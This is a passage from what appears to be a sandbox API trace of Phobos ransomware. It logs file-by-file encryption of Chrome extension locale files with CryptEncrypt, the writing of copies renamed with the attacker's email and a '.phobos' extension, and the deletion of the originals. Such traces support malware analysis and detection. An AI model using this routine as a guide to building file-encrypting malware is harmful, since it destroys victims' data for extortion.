Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.002] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.002] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.002] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x108, lpOverlapped=0x0) returned 1 [0161.003] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0161.003] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0161.004] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0161.004] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.004] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0161.004] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.004] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0161.004] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.004] CloseHandle (hObject=0x17c) returned 1 [0161.004] CloseHandle (hObject=0x134) returned 1 [0161.004] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json")) returned 1 [0161.005] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0161.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.005] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=222) returned 1 [0161.005] CloseHandle (hObject=0x134) returned 1 [0161.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json")) returned 0x2020 [0161.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.006] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.006] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.006] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.006] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.006] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xde, lpOverlapped=0x0) returned 1 [0161.007] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0161.007] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0161.008] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0161.008] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.008] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0161.008] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.008] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0161.008] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.008] CloseHandle (hObject=0x134) returned 1 [0161.008] CloseHandle (hObject=0x17c) returned 1 [0161.008] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json")) returned 1 [0161.009] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0161.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.009] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=223) returned 1 [0161.009] CloseHandle (hObject=0x17c) returned 1 [0161.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json")) returned 0x2020 [0161.010] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.010] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.010] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.010] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.010] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.010] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xdf, lpOverlapped=0x0) returned 1 [0161.011] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0161.011] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0161.012] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0161.012] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.012] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0161.012] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.012] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0161.012] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.012] CloseHandle (hObject=0x17c) returned 1 [0161.012] CloseHandle (hObject=0x134) returned 1 [0161.012] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json")) returned 1 [0161.013] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0161.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.014] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=265) returned 1 [0161.014] CloseHandle (hObject=0x134) returned 1 [0161.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json")) returned 0x2020 [0161.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.014] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.014] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.015] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.015] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.015] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x109, lpOverlapped=0x0) returned 1 [0161.016] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0161.016] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0161.017] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0161.017] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.017] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0161.017] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.017] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0161.017] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.017] CloseHandle (hObject=0x134) returned 1 [0161.017] CloseHandle (hObject=0x17c) returned 1 [0161.017] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json")) returned 1 [0161.018] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0161.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.019] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=286) returned 1 [0161.019] CloseHandle (hObject=0x17c) returned 1 [0161.019] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json")) returned 0x2020 [0161.019] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.019] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.019] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.020] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.020] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.020] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x11e, lpOverlapped=0x0) returned 1 [0161.081] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120, dwBufLen=0x120 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120) returned 1 [0161.081] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x120, lpOverlapped=0x0) returned 1 [0161.082] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0161.082] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.082] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, 